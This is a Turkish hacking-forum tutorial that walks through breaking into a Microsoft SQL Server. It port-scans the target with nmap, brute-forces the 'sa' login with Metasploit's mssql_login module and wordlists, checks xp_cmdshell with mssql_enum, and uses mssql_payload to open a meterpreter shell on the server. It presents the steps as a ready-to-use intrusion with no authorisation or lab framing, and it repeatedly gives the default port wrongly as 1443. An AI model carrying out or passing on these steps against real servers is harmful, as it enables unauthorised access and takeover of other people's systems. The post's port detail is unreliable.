Microsoft SQL Server'a Sızalım//"P4RS

P4RS

Özel Üye
8 Ocak 2017
5,156
57
Ankara
Merhabalar TürkHackTeam ailesi, bugün sizlere "Microsoft SQL Server'e Sızalım" konusunu göstereceğim. İlk öncelikle başlıklarımıza bakalım ve Microsoft SQL Server'ın ne olduğuna bir bakalım.

Konu Başlıkları
• Microsoft SQL Server Nedir?
• Microsoft SQL Server Neden Kullanılır?
• XP_CMDSHELL NEDİR?
• Microsoft SQL Server'a Sızalım


JPSbGB.png


Microsoft SQL Server Nedir?


CyTKAI.png



Bir websitenin veya bir yazılımın bilgilerinin depolandığı veritabanı sistemidir. MSSQL en çok kullanılan veritabanı tiplerindendir.

JPSbGB.png


Microsoft SQL Server Neden Kullanılır?

MSSQL Windows makineler üzerinde .NET ve .ASP ile yazılmış web sitelerinin ve yazılımlarının veritabanı olarak kullanılır.


JPSbGB.png


XP_CMDSHELL NEDİR?

SQL Server da cmd komut satırını kullanmamıza yarayan bir araçtır. Bu özellik ile cmd komut satırında yapabildiğimiz her şeyi yapabiliriz.


Bu kadar terimsel anlatım yeter bence :)) Hadi işlemlerimize başlayalım.


JPSbGB.png



Microsoft SQL Server'a Sızalım

Bir cihaz, Microsoft SQL Server 1443 portundan işlem yapmaktadır. Yani bizim için önemli yer burası olacak. Bir port taraması yaparak hedefimizin 1443 portu'nun açık olup olmadığına bakalım. Bu yöntemimiz de Brute yapacağız arkadaşlar o yüzden güzel bir wordlist belirleyiniz.
Bunun için
Kod:
nmap -sS -sV IP_ADRESI
yazalım.

JVJVCU.jpg


Taramamız gerçekleşti ve 1443 portu açık olduğu gözüküyor. Buradan işlem yapacağız.

AdS9Ny.jpg


Şimdi terminale msfconsole yazalım ve açıldıktan sonra
Kod:
use auxiliary/scanner/mssql/mssql_login
yazalım ve exploite giriş yapalım. Daha sonra ayarlarımızı görmek için
Kod:
show options
yazalım.

WCI28y.jpg


Şimdi ayarlarımızı girelim öncelikle port ayarımızı girelim bunun için
Kod:
set RHOSTS IP_ADRESI
yazalım ve kullanıcı adı ve şifre dosyalarını tanımlamak için
Kod:
set USER_FILE DOSYA_YOLU
ve
Kod:
set PASS_FILE DOSYA_YOLU
olarak yazalım ve exploiti başlatmak için
Kod:
exploit
diyelim.

1dNW1d.jpg


Gördüğünüz gibi Brute yöntemi yaptı ve giriş bilgilerini bizlere gösterdi. Kullanıcı adı sa şifre 1234.

sa : Server Administration(Sunucu Yöneticisi)

HRc3RN.jpg


Şimdi şifreyi ve kullanıcı adını aldık. Bir de xp_cmdshell'in aktif olup olmadığına bakalım.

xp_cmdshell ne olduğundan bahsetmiştim üstte fakat neden bunu kullanalım ki buradan giriş yapılıyorsa diyorsanız cevabını vereyim. CMD ile yapabildiğimiz her şeyi yapabiliyoruz ve kullanım kolaylığı sağlıyor bizlere.
Şimdi sunucumuzda xp_cmdshell açık mı diye bakalım. Bunun için terminale
Kod:
msfconsole
yazıyoruz ve çıkan ekrana
Kod:
use auxiliary/admin/mssql/mssql_enum
yazalım.

Q8SM8W.jpg


Sonra ayarları yapacağız bunu için ayarlara bakalım
Kod:
show options
yazalım, IP adresini ayarlamak için
Kod:
set RHOST IP_ADRESI
olarak yazalım.
Şifreyi ayarlamak için
Kod:
set PASSWORD 1234
yazalım. (1234'ü brute yönteminden bulmuştuk.) Kullanıcı adı zaten sa olduğu için ellemedim.
exploit diyerek işlemi başlatalım.

J2JbBO.jpg


Gördüğünüz gibi xp_cmdshell'imiz aktif. "xp_cmdshell" in açık olması demek karşı tarafta shell açabileceğiz demektir.


SQ1OCz.jpg


Shell açmak için terminale yine
Kod:
msfconsole
yazıyoruz. Daha sonra
Kod:
use exploit/windows/mssql/mssql_payload
yazarak exploite giriş yapıyoruz.

K9fQGz.jpg


Burada yine ayarlarız yapacağız öncelikle IP adresimizi ayarlayalım bunun için
Kod:
set RHOSTS IP_ADRESI
olarak yazıyoruz ve şifreyi ayarlamak için
Kod:
set PASSWORD Şifre
yazıyoruz.

exploit yazarak işlemimizi yapıyoruz.

K9fQGz.jpg


meterpreter kısmına gelince shell yazarak shelli açıyoruz.

2xCTQ1.jpg


Gördüğünüz gibi sisteme giriş yaptık. Buradan istediğiniz işlemleri yapabilirsiniz.

LWAB3O.jpg



2xWyC6.png



Konum bu kadardı arkadaşlar başka bir konumda görüşmek üzere sağlıcakla...



 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.